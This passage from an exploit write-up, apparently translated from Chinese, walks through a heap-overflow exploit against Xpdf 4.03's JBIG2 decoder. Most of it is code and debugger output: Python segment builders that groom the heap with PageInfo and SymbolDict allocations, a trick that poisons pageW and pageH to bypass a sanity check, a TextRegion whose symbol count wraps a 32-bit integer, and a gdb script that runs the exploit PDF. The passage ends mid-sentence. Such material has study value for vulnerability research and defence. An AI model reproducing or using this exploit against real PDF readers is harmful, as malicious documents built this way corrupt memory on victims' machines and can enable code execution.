class="line">0x580: 0x5555557cc2b0 —▸ 0x555555797d80 —▸ 0x7ffff7ad9050 (main_arena+1200) ◂— 0x5555557cc2b0</span><br><span class="line">0x600: 0x5555557c7db0 —▸ 0x7ffff7ad9070 (main_arena+1232) ◂— 0x5555557c7db0</span><br><span class="line">0x640: 0x5555557be580 —▸ 0x7ffff7ad9080 (main_arena+1248) ◂— 0x5555557be580</span><br><span class="line">0x780: 0x5555557ea9f0 —▸ 0x5555557cb9e0 —▸ 0x7ffff7ad90d0 (main_arena+1328) ◂— 0x5555557ea9f0</span><br><span class="line">0x800: 0x5555557985d0 —▸ 0x7ffff7ad90f0 (main_arena+1360) ◂— 0x5555557985d0</span><br><span class="line">0x840: 0x5555557cdc00 —▸ 0x7ffff7ad9100 (main_arena+1376) ◂— 0x5555557cdc00</span><br><span class="line">0x900: 0x5555557bdba0 —▸ 0x7ffff7ad9130 (main_arena+1424) ◂— 0x5555557bdba0</span><br><span class="line">0x940: 0x5555557e77f0 —▸ 0x5555557e9b00 —▸ 0x7ffff7ad9140 (main_arena+1440) ◂— 0x5555557e77f0</span><br><span class="line">0x980: 0x5555557d86b0 —▸ 0x5555557ebea0 —▸ 0x7ffff7ad9150 (main_arena+1456) ◂— 0x5555557d86b0</span><br><span class="line">0x9c0: 0x555555795c40 —▸ 0x7ffff7ad9160 (main_arena+1472) ◂— 0x555555795c40 /* &#x27;@\\yUUU&#x27; */</span><br><span class="line">0xa00: 0x5555557cd080 —▸ 0x7ffff7ad9170 (main_arena+1488) ◂— 0x5555557cd080</span><br><span class="line">0xa40: 0x555555799440 —▸ 0x5555557d1e40 —▸ 0x7ffff7ad9180 (main_arena+1504) ◂— 0x555555799440</span><br><span class="line">0xac0: 0x5555557e83c0 —▸ 0x5555557e6100 —▸ 0x7ffff7ad91a0 (main_arena+1536) ◂— 0x5555557e83c0</span><br><span class="line">0xb00: 0x5555557d2a20 —▸ 0x7ffff7ad91b0 (main_arena+1552) ◂— 0x5555557d2a20 /* &#x27; *&#125;UUU&#x27; */</span><br><span class="line">0xb40: 0x5555557e6c70 —▸ 0x5555557feb50 —▸ 0x7ffff7ad91c0 (main_arena+1568) ◂— 0x5555557e6c70 /* &#x27;pl~UUU&#x27; */</span><br><span class="line">0xc40: 0x5555557eb210 —▸ 0x5555557e8ea0 —▸ 0x7ffff7ad9200 (main_arena+1632) ◂— 0x5555557eb210</span><br><span class="line">0xe00: 0x5555557c00c0 —▸ 0x5555557b9630 —▸ 0x5555557c4590 —▸ 0x7ffff7ad9210 
(main_arena+1648) ◂— 0x5555557c00c0</span><br><span class="line">0x1400: 0x5555557b5420 —▸ 0x7ffff7ad9240 (main_arena+1696) ◂— 0x5555557b5420 /* &#x27; T&#123;UUU&#x27; */</span><br><span class="line">0x1600: 0x5555557ce770 —▸ 0x7ffff7ad9250 (main_arena+1712) ◂— 0x5555557ce770</span><br><span class="line">0x1800: 0x5555557bae40 —▸ 0x7ffff7ad9260 (main_arena+1728) ◂— 0x5555557bae40</span><br><span class="line">0x2600: 0x5555557b6aa0 —▸ 0x5555557c1110 —▸ 0x7ffff7ad92d0 (main_arena+1840) ◂— 0x5555557b6aa0</span><br><span class="line">0x2a00: 0x55555579af20 —▸ 0x7ffff7ad92f0 (main_arena+1872) ◂— 0x55555579af20</span><br><span class="line">0x3000: 0x5555557d3d80 —▸ 0x5555557d9b60 —▸ 0x5555557c88a0 —▸ 0x7ffff7ad9300 (main_arena+1888) ◂— 0x5555557d3d80</span><br></pre></td></tr></table></figure><p>These fragmented chunks get in the way of the heap feng shui that follows, so they all need to be allocated away. We use <code>PageInfoSeg</code> for this, because reading the code shows that <code>JBIG2Stream::readPageInfoSeg</code> <strong>has no effect other than allocating one chunk</strong>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">DummyAlloc</span>(<span class="params">size</span>):</span><br><span class="line">    <span class="keyword">return</span> PageInfo(<span class="number">233</span>, w=<span class="number">8</span>, h=size)</span><br><span class="line"></span><br><span class="line">global_file = [</span><br><span class="line">    SymbolDict(<span class="number">0</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * <span class="number">0x10000</span>),</span><br><span class="line">    
SymbolDict(<span class="number">1</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * (size_to_overflow // <span class="number">8</span>)),</span><br><span class="line">    SymbolDict(<span class="number">2</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)]),</span><br><span class="line">    <span class="comment"># Heap grooming: eat every chunk in &#123;tcache,fast,small,large,unsorted&#125; bins</span></span><br><span class="line">    [[DummyAlloc(size)] * <span class="number">128</span> <span class="keyword">for</span> size <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>, <span class="number">0x1000</span>, <span class="number">0x10</span>)],</span><br><span class="line">    [[DummyAlloc(size)] * <span class="number">16</span> <span class="keyword">for</span> size <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1000</span>, <span class="number">0x10000</span>, <span class="number">0x100</span>)],</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>The bins after these allocations are shown below, and they are noticeably cleaner:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">bins</span></span><br><span 
class="line">tcachebins</span><br><span class="line">empty</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x0</span><br><span class="line">smallbins</span><br><span class="line">0x20 [corrupted]</span><br><span class="line">FD: 0x55555579d9f0 —▸ 0x5555557d2860 —▸ 0x555555798db0 —▸ 0x5555557d7fe0 —▸ 0x5555557d7c30 ◂— ...</span><br><span class="line">BK: 0x5555557f96e0 —▸ 0x5555557f9300 —▸ 0x5555557fb200 —▸ 0x5555557fdf40 —▸ 0x5555557fd390 ◂— ...</span><br><span class="line">largebins</span><br><span class="line">empty</span><br></pre></td></tr></table></figure><p>The next question is how to design the heap feng shui. The exploit takes a clear approach:</p><blockquote><p>Use the fact that the global segment GList <strong>grows when it is full</strong> to create heap holes, then let other structures occupy those holes to complete the heap feng shui.</p></blockquote><p>What does that mean? Let's look at some of GList's methods:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">GList::<span class="built_in">GList</span>() &#123;</span><br><span class="line">  size = <span class="number">8</span>;</span><br><span class="line">  data = (<span class="type">void</span> **)<span 
class="built_in">gmallocn</span>(size, <span class="built_in">sizeof</span>(<span class="type">void</span>*));</span><br><span class="line">  length = <span class="number">0</span>;</span><br><span class="line">  inc = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">GList::append</span><span class="params">(<span class="type">void</span> *p)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (length &gt;= size) &#123;</span><br><span class="line">    <span class="built_in">expand</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  data[length++] = p;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">GList::expand</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  size += (inc &gt; <span class="number">0</span>) ? 
inc : size;</span><br><span class="line">  data = (<span class="type">void</span> **)<span class="built_in">greallocn</span>(data, size, <span class="built_in">sizeof</span>(<span class="type">void</span>*));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As the code shows, the <strong>GList size starts at 8</strong>. When an append finds the list full (<code>length &gt;= size</code>), the capacity <strong>doubles</strong>, because <code>inc</code> is 0. In other words, size starts at 8, becomes 16 after the first expansion, 32 after the second, and 64 after the third (counted in pointers).</p><p>The expansion goes through <code>realloc</code>, so once the GList grows, the old chunk <strong>is freed</strong>. And because every other small free chunk has already been handed out above, <strong>the new chunk for each expansion must come from the top chunk</strong>. This guarantees that on every expansion <strong>new chunks are allocated from low addresses to high addresses</strong>.</p><p>So we make the global segment GList expand several times, from 8 up to the final size we need, 64:</p><blockquote><p>In the code, glist_capacity == 32. My reading is that this number indicates <strong>at which append to the global GList the GList size grows to 64</strong>.</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">global_file = [</span><br><span class="line">    SymbolDict(<span class="number">0</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * <span class="number">0x10000</span>),</span><br><span class="line">    SymbolDict(<span class="number">1</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * (size_to_overflow // <span class="number">8</span>)),</span><br><span class="line">    SymbolDict(<span class="number">2</span>, [Bitmap(<span 
class="number">1</span>, <span class="number">1</span>)]),</span><br><span class="line">    <span class="comment"># Heap grooming: eat every chunk in &#123;tcache,fast,small,large,unsorted&#125; bins</span></span><br><span class="line">    [[DummyAlloc(size)] * <span class="number">128</span> <span class="keyword">for</span> size <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>, <span class="number">0x1000</span>, <span class="number">0x10</span>)],</span><br><span class="line">    [[DummyAlloc(size)] * <span class="number">16</span> <span class="keyword">for</span> size <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1000</span>, <span class="number">0x10000</span>, <span class="number">0x100</span>)],</span><br><span class="line">    <span class="comment"># ------------ heap feng shui starts here ------------</span></span><br><span class="line">    [SymbolDict(i, []) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>, glist_capacity // <span class="number">2</span>)],</span><br><span class="line">    <span class="comment"># Now most bins are empty, except tcachebin 0x20, 0x50 and small bin 0x20</span></span><br><span class="line">    <span class="comment"># This triggers GList::expand(), 0x80 -&gt; 0x100; allocates from top chunk</span></span><br><span class="line">    SymbolDict(glist_capacity // <span class="number">2</span>, []),</span><br><span class="line">    [SymbolDict(i, []) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(glist_capacity // <span class="number">2</span> + <span class="number">1</span>, glist_capacity)],</span><br><span class="line">    <span class="comment"># 0x100 -&gt; 0x200, the old chunk should fall in tcache</span></span><br><span class="line">    SymbolDict(<span class="number">100</span>, []),</span><br><span 
class="line">]</span><br></pre></td></tr></table></figure><p>Once the heap feng shui in the global segment has run, the heap layout looks roughly like this:</p><blockquote><p>Note that for the Symbol Dicts with segNum starting at 3, the chunks allocated for their structs (chunk size = 0x40) also come straight from the top chunk.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// low address --------------------------------------------</span></span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">    Other heap allocations, including </span></span><br><span class="line"><span class="comment">    1. the size=8 global GList backing store</span></span><br><span class="line"><span class="comment">    2. DummyAlloc</span></span><br><span class="line"><span class="comment">    3. SymbolDict 0, 1, 2</span></span><br><span class="line"><span class="comment">    4. 
...</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">SymbolDict3<span class="number">-8</span>;</span><br><span class="line">size=<span class="number">16</span> global GList backing store (heap hole)</span><br><span class="line">SymbolDict9<span class="number">-16</span>;</span><br><span class="line">size=<span class="number">32</span> global GList backing store (heap hole)</span><br><span class="line">SymbolDict17<span class="number">-32</span>;</span><br><span class="line">size=<span class="number">64</span> global GList backing store <span class="comment">// final location of the GList data; this one is not a hole</span></span><br><span class="line"><span class="comment">// high address -------------------------------------------</span></span><br></pre></td></tr></table></figure><p>From here, we only need to:</p><ul><li><p>make the pageBitmap backing store occupy the size=16 GList heap hole</p></li><li><p>make the syms pointer array created while parsing the TextRegion occupy the size=32 GList heap hole</p></li></ul><p>That completes the heap layout.</p><blockquote><p>Where the pageBitmap's JBIG2Bitmap struct lands on the heap is explained further below.</p></blockquote><p>Finally, here is a gdb script that helps observe the memory layout:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">file ../../xpdf-4.03/build/xpdf/pdftohtml</span><br><span class="line">aslr off</span><br><span class="line"><span class="built_in">set</span> follow-fork-mode parent</span><br><span class="line"></span><br><span class="line">b readSymbolDictSeg <span class="keyword">if</span> segNum==8</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;sakura in read symbol 8\n&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;globalSegments addr is:0x%llx\n&quot;</span>, segments</span><br><span class="line">    <span 
class="built_in">printf</span> <span class="string">&quot;segments GList backing buffer\n&quot;</span></span><br><span class="line">    p *(GList *)segments</span><br><span class="line">    <span class="comment"># tcachebins</span></span><br><span class="line">    bins</span><br><span class="line">    <span class="comment"># c</span></span><br><span class="line">end</span><br><span class="line">b readSymbolDictSeg <span class="keyword">if</span> segNum==16</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;sakura in read symbol 16\n&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;globalSegments addr is:0x%llx\n&quot;</span>, segments</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;segments GList backing buffer\n&quot;</span></span><br><span class="line">    p *(GList *)segments</span><br><span class="line">    <span class="comment"># tcachebins</span></span><br><span class="line">    bins</span><br><span class="line">    <span class="comment"># c</span></span><br><span class="line">end</span><br><span class="line">b readSymbolDictSeg <span class="keyword">if</span> segNum==100</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;sakura in read symbol 32\n&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;globalSegments addr is:0x%llx\n&quot;</span>, segments</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;segments GList backing buffer\n&quot;</span></span><br><span class="line">    p *(GList *)segments</span><br><span class="line">    <span class="comment"># tcachebins</span></span><br><span class="line">    
bins</span><br><span class="line">    </span><br><span class="line">    tb JBIG2Stream.cc:1481</span><br><span class="line">    commands</span><br><span class="line">        <span class="built_in">printf</span> <span class="string">&quot;after finish globalSegments addr is:0x%llx\n&quot;</span>, segments</span><br><span class="line">        p *(GList *)segments</span><br><span class="line">        <span class="comment"># tcachebins</span></span><br><span class="line">        bins</span><br><span class="line">    end</span><br><span class="line">    <span class="comment"># replace finish and print info</span></span><br><span class="line">    <span class="comment"># c</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b JBIG2Stream.cc:2072 <span class="keyword">if</span> segNum==102</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;sakura in TextRegion to trigger oob\n&quot;</span></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;numSyms after underoverflow is:0x%llx\n&quot;</span>, numSyms</span><br><span class="line">    <span class="built_in">set</span> <span class="variable">$oob_syms</span> = <span class="variable">$rax</span></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;undersized syms buffer addr is:0x%llx\n&quot;</span>, <span class="variable">$oob_syms</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;globalSegments addr is:0x%llx\n&quot;</span>, globalSegments</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;segments GList backing buffer\n&quot;</span></span><br><span class="line">    p *(GList *)globalSegments</span><br><span class="line"></span><br><span class="line">    <span 
class="built_in">printf</span> <span class="string">&quot;pageBitmap addr is :0x%llx\n&quot;</span>, pageBitmap</span><br><span class="line">    p *(JBIG2Bitmap *)pageBitmap</span><br><span class="line">    bins</span><br><span class="line"></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">r sploit.pdf output</span><br></pre></td></tr></table></figure><h4 id="b-占据堆空洞">b. Occupying the heap holes</h4><p>The parsing done in the global stream creates the heap holes; the parsing done in the main stream fills them.</p><p>Continuing from above, we now allocate a brand-new pageBitmap and make its backing store occupy the size=16 GList hole:</p><blockquote><p>In the code, GLIST_DATA_SIZE = 0x200, the number of bytes the global GList data occupies when size=64.</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">page0 = [</span><br><span class="line">    <span class="comment"># Make sure page bitmap buffer uses the second-last globalSegments data buffer so</span></span><br><span class="line">    <span class="comment"># that it lies just before syms, at a fixed offset.</span></span><br><span class="line">    <span class="comment"># GLIST_DATA_SIZE // 4 matches the GList heap hole left at size=16</span></span><br><span class="line">    PageInfo(<span class="number">101</span>, w=<span class="number">8</span> * (GLIST_DATA_SIZE // <span class="number">4</span>), h=<span class="number">1</span>),</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>The heap layout is now:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// low address --------------------------------------------</span></span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">    Other heap allocations, including </span></span><br><span class="line"><span class="comment">    1. the size=8 global GList backing store</span></span><br><span class="line"><span class="comment">    2. DummyAlloc</span></span><br><span class="line"><span class="comment">    3. SymbolDict 0, 1, 2</span></span><br><span class="line"><span class="comment">    4. 
...</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">SymbolDict3<span class="number">-8</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Look here!</span></span><br><span class="line">pageBitmap backing buffer <span class="comment">// heap hole left by the size=16 global GList backing store</span></span><br><span class="line">    </span><br><span class="line">SymbolDict9<span class="number">-16</span>;</span><br><span class="line"></span><br><span class="line">size=<span class="number">32</span> global GList backing store (heap hole)</span><br><span class="line">    </span><br><span class="line">SymbolDict17<span class="number">-32</span>;</span><br><span class="line"></span><br><span class="line">size=<span class="number">64</span> global GList backing store; <span class="comment">// final location of the GList data; this one is not a hole</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Look here!</span></span><br><span class="line">pageBitmap JBIG2Bitmap struct; </span><br><span class="line">    </span><br><span class="line"><span class="comment">// high address -------------------------------------------</span></span><br></pre></td></tr></table></figure><p>A quick note on the chunk allocated for the pageBitmap <strong>struct itself (JBIG2Bitmap)</strong>: since no free chunk in the bins can satisfy its size of 0x20, it is <strong>still allocated from the top chunk</strong>. Its address is therefore <strong>higher</strong> than that of the size=64 GList buffer, which is what the heap feng shui requires.</p><p>Next, parsing the TextRegion has to claim the size=32 GList heap hole. The user memory allocated in the TextRegion must therefore be <code>syms_size = GLIST_DATA_SIZE // 2</code>, which matches the size of that hole exactly.</p><p>Before going any further, though, we need to bypass <a href="https://fossies.org/diffs/xpdf/4.02_vs_4.03/xpdf/JBIG2Stream.cc-diff.html">a rather amusing sanity check</a>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sanity check: if the w/h/x/y values are way out of range, it likely</span></span><br><span class="line"><span class="comment">// indicates a damaged JBIG2 stream</span></span><br><span class="line"><span class="keyword">if</span> (w / <span class="number">10</span> &gt; pageW || h / <span class="number">10</span> &gt; pageH ||</span><br><span class="line">    x / <span class="number">10</span> &gt; pageW || y / <span class="number">10</span> &gt; pageH) &#123;</span><br><span class="line">    <span class="built_in">error</span>(errSyntaxError, <span class="built_in">getPos</span>(),</span><br><span class="line">          <span class="string">&quot;Bad size or position in JBIG2 text region segment&quot;</span>);</span><br><span class="line">    done = gTrue;</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This kind of sanity check appears several times in <code>xpdf-4.03/xpdf/JBIG2Stream.cc</code>. It checks whether the w/h/x/y values being processed lie far beyond the current pageW and pageH (two member variables of the JBIG2Stream class that hold the width and height of the current page). If they do, something is probably wrong with the stream, so parsing of the current segment stops immediately.</p><p>At first glance this sanity check looks fine...</p><p>But let's go back and look at the code of <code>readPageInfoSeg</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readPageInfoSeg</span><span class="params">(Guint length)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    Guint xRes, yRes, flags, striping;</span><br><span class="line">    <span class="comment">// pageW and pageH are read directly from the untrusted stream</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">readULong</span>(&amp;pageW) || !<span class="built_in">readULong</span>(&amp;pageH) ||</span><br><span class="line">        !<span class="built_in">readULong</span>(&amp;xRes) || !<span class="built_in">readULong</span>(&amp;yRes) ||</span><br><span class="line">        !<span class="built_in">readUByte</span>(&amp;flags) || !<span class="built_in">readUWord</span>(&amp;striping))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">goto</span> eofError;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// if pageW / pageH are zero or too large</span></span><br><span class="line">    <span class="keyword">if</span> (pageW == <span class="number">0</span> || pageH == <span class="number">0</span> || pageW &gt; INT_MAX / pageW)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// just bail out of parsing this PageInfoSeg</span></span><br><span class="line">        <span class="built_in">error</span>(errSyntaxError, <span class="built_in">getPos</span>(), <span class="string">&quot;Bad page size in JBIG2 stream&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>It is easy to see that even when
<code>readPageInfoSeg</code> detects an abnormal <code>pageW</code> or <code>pageH</code>, it merely stops parsing the current segment and <strong>leaves the malformed <code>pageW</code> and <code>pageH</code> values in the JBIG2Stream class members</strong>.</p><p>So we can insert a PageInfoSeg with a huge pageW and pageH, poisoning both fields with huge values and bypassing every newly added sanity check that follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">page0 = [</span><br><span class="line">    <span class="comment"># Make sure page bitmap buffer uses the second-last globalSegments data buffer so</span></span><br><span class="line">    <span class="comment"># that it lies just before syms, at a fixed offset.</span></span><br><span class="line">    PageInfo(<span class="number">101</span>, w=<span class="number">8</span> * (GLIST_DATA_SIZE // <span class="number">4</span>), h=<span class="number">1</span>),</span><br><span class="line">    <span class="comment"># Change pageH and pageW to a large value to bypass a (seriously funny) sanity</span></span><br><span class="line">    <span class="comment"># check introduced in Xpdf 4.03; Xpdf would report an error without allocating</span></span><br><span class="line">    <span class="comment"># a new pageBitmap, but won&#x27;t stop parsing the JBIG2 stream, which is exactly what</span></span><br><span class="line">    <span class="comment"># we want.</span></span><br><span class="line">    PageInfo(<span class="number">101</span>, w=<span class="number">1919114514</span>, h=<span class="number">1919114514</span>),</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>With this sanity check bypassed, we can create the TextRegionSeg that performs the heap overflow. Following on from the above, the
TextRegionSeg created here must meet these requirements:</p><ul><li>The syms buffer it creates must be syms_size bytes (the value explained above)</li><li>The data written into the chunk must be <code>size_to_overflow</code> bytes, i.e. <code>size_to_overflow // 8</code> pointers are actually written</li></ul><p>So in the main stream we need to combine the sizes of the Symbol Dicts referenced by the TextRegion appropriately:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Trigger the out-of-bound write.</span></span><br><span class="line">TextRegion(</span><br><span class="line">    <span class="number">102</span>,</span><br><span class="line">    w=<span class="number">1</span>,</span><br><span class="line">    h=<span class="number">1</span>,</span><br><span class="line">    x=<span class="number">0</span>,</span><br><span class="line">    y=<span class="number">0</span>,</span><br><span class="line">    <span class="comment"># size_to_overflow // 8 pointers</span></span><br><span class="line">    ref_segs=[<span class="number">1</span>] </span><br><span class="line">    <span class="comment"># 0x10000 + (syms_size - size_to_overflow) // 8 pointers</span></span><br><span class="line">    + [<span class="number">2</span>] * (<span class="number">0x10000</span> + (syms_size - size_to_overflow) // <span class="number">8</span>)</span><br><span class="line">    <span class="comment"># 0xffff0000 pointers in total</span></span><br><span class="line">    + [<span class="number">0</span>] * <span class="number">0xFFFF</span>, </span><br><span class="line">),</span><br></pre></td></tr></table></figure><p>In the combination above, the total number of referenced symbols is</p><p>$$\mathrm{size\_to\_overflow}/8 + \left(\mathrm{0x10000} + (\mathrm{syms\_size} - \mathrm{size\_to\_overflow})/8\right) + \mathrm{0xffff0000} = \mathrm{0x100000000} + \mathrm{syms\_size}/8$$ so once the 32-bit count wraps around, only syms_size / 8 pointers remain, i.e. exactly syms_size bytes are allocated.</p><p>And since the Symbol Dict referenced first holds <code>size_to_overflow // 8</code> 